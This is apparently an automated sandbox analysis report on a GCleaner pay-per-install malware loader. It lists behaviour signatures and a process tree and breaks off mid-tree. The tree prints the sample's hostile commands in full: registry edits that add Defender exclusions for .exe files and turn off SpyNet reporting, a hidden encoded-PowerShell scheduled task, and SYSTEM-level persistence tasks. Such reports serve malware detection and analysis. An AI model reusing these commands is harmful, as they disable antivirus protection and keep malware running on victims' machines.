Analysis

  • max time kernel
    475s
  • max time network
    480s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/07/2023, 15:05

Errors

Reason
Machine shutdown

General

Malware Config

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 36 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 29 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 56 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" http://google
    1⤵
    • Adds Run key to start application
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4564
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe9a1e9758,0x7ffe9a1e9768,0x7ffe9a1e9778
      2⤵
        PID:4320
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:2
        2⤵
          PID:3052
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
          2⤵
            PID:3160
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
            2⤵
              PID:4664
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
              2⤵
                PID:2028
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3268 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                2⤵
                  PID:2156
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4548 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                  2⤵
                    PID:5008
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4724 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                    2⤵
                      PID:2852
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4896 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                      2⤵
                        PID:2700
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4856 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                        2⤵
                          PID:456
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5096 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                          2⤵
                            PID:1904
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3272 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                            2⤵
                              PID:1280
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                              2⤵
                                PID:1216
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                                2⤵
                                  PID:4660
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4680 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                  2⤵
                                    PID:1632
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3232 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                    2⤵
                                      PID:1808
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                                      2⤵
                                        PID:768
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4824 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                        2⤵
                                          PID:4952
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5764 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                          2⤵
                                            PID:3340
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                                            2⤵
                                            • Modifies registry class
                                            PID:4928
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3964 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                                            2⤵
                                              PID:4060
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5740 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                              2⤵
                                                PID:1196
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6008 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                                2⤵
                                                  PID:4236
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=744 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                                  2⤵
                                                    PID:2160
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5088 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                                    2⤵
                                                      PID:2756
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3940 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:1
                                                      2⤵
                                                        PID:3980
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6360 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                                                        2⤵
                                                          PID:2260
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6380 --field-trial-handle=1900,i,15460760028930552261,15274252013747540685,131072 /prefetch:8
                                                          2⤵
                                                            PID:980
                                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                          1⤵
                                                            PID:1788
                                                          • C:\Windows\System32\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                            1⤵
                                                              PID:5088
                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_setup-U9wW8pNHAV.zip\setup-U9wW8pNHAV.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Temp1_setup-U9wW8pNHAV.zip\setup-U9wW8pNHAV.exe"
                                                              1⤵
                                                                PID:1124
                                                                • C:\Users\Admin\AppData\Local\Temp\is-T49L3.tmp\setup-U9wW8pNHAV.exe.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-T49L3.tmp\setup-U9wW8pNHAV.exe.tmp" /SL5="$70236,3550192,53248,C:\Users\Admin\AppData\Local\Temp\Temp1_setup-U9wW8pNHAV.zip\setup-U9wW8pNHAV.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  PID:4788
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    "C:\Windows\system32\net.exe" helpmsg 10
                                                                    3⤵
                                                                      PID:4912
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 helpmsg 10
                                                                        4⤵
                                                                          PID:4776
                                                                      • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe
                                                                        "C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:4876
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        "C:\Windows\system32\schtasks.exe" /Delete /F /TN "hgtach710 Service"
                                                                        3⤵
                                                                          PID:2112
                                                                        • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe
                                                                          "C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe" 81cd2962a3d0f2dd3455186f77b391ce
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies registry class
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3816
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\ae5D41eH\OvohTJo7tfOZ52.exe"
                                                                            4⤵
                                                                              PID:1712
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\ae5D41eH\OvohTJo7tfOZ52.exe"
                                                                                5⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:3692
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\mldnoUkQ\YIXMqLnyEjMv.exe"
                                                                              4⤵
                                                                                PID:2792
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\mldnoUkQ\YIXMqLnyEjMv.exe"
                                                                                  5⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:4752
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\4SwDpT4T\AlNbV2p.exe"
                                                                                4⤵
                                                                                  PID:2668
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\4SwDpT4T\AlNbV2p.exe"
                                                                                    5⤵
                                                                                      PID:2288
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe"
                                                                                    4⤵
                                                                                      PID:4236
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe"
                                                                                        5⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:416
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\qsrwYHl7\ZQAJA00NP2NQ1Mw.exe"
                                                                                      4⤵
                                                                                        PID:2800
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\qsrwYHl7\ZQAJA00NP2NQ1Mw.exe"
                                                                                          5⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4840
                                                                                      • C:\Users\Admin\AppData\Local\Temp\qsrwYHl7\ZQAJA00NP2NQ1Mw.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\qsrwYHl7\ZQAJA00NP2NQ1Mw.exe /did=757674 /S
                                                                                        4⤵
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in System32 directory
                                                                                        • Enumerates system info in registry
                                                                                        PID:844
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                          5⤵
                                                                                            PID:2944
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                              6⤵
                                                                                                PID:1648
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                              5⤵
                                                                                                PID:1480
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                  6⤵
                                                                                                    PID:4472
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                      7⤵
                                                                                                        PID:4572
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                        7⤵
                                                                                                          PID:2432
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "gqfHrzilO" /SC once /ST 11:46:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                      5⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:2904
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /run /I /tn "gqfHrzilO"
                                                                                                      5⤵
                                                                                                        PID:4692
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "gqfHrzilO"
                                                                                                        5⤵
                                                                                                          PID:1336
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /CREATE /TN "bryKvsyaXJGRzVMfxC" /SC once /ST 15:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MIYBjYAhlshrJpIEE\eQQeaRcPNZZCeWQ\rcEMRRz.exe\" KZ /dOsite_idagJ 757674 /S" /V1 /F
                                                                                                          5⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:4488
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe --silent --allusers=0
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Enumerates connected drives
                                                                                                        • Modifies system certificate store
                                                                                                        PID:1932
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.47 --initial-client-data=0x300,0x304,0x308,0x2dc,0x30c,0x6f3fd178,0x6f3fd188,0x6f3fd194
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:1928
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\izI45DYKHQrzx6FsZlYn.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\izI45DYKHQrzx6FsZlYn.exe" --version
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:4812
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1932 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20230710150823" --session-guid=158ba21b-ee2f-4dd4-a3e8-b1348f221089 --server-tracking-blob="NzcyMDhkZDE3YTYxZGE2Njk4ZjQ4NTY3MWIwM2NkYTVlNWYyYmE1MWNmYWNiMjMwYjA2YzY5YTk0NTUxMTFmMDp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY4OTAwMTY5Mi42MTkzIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExLjAuNDY2NC4xMzcgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiZjAzNGFkYzgtMDFlNS00ZGNlLTg1ZGEtMDgyOTRhNTlmZWY2In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=9805000000000000
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Enumerates connected drives
                                                                                                          PID:4560
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe
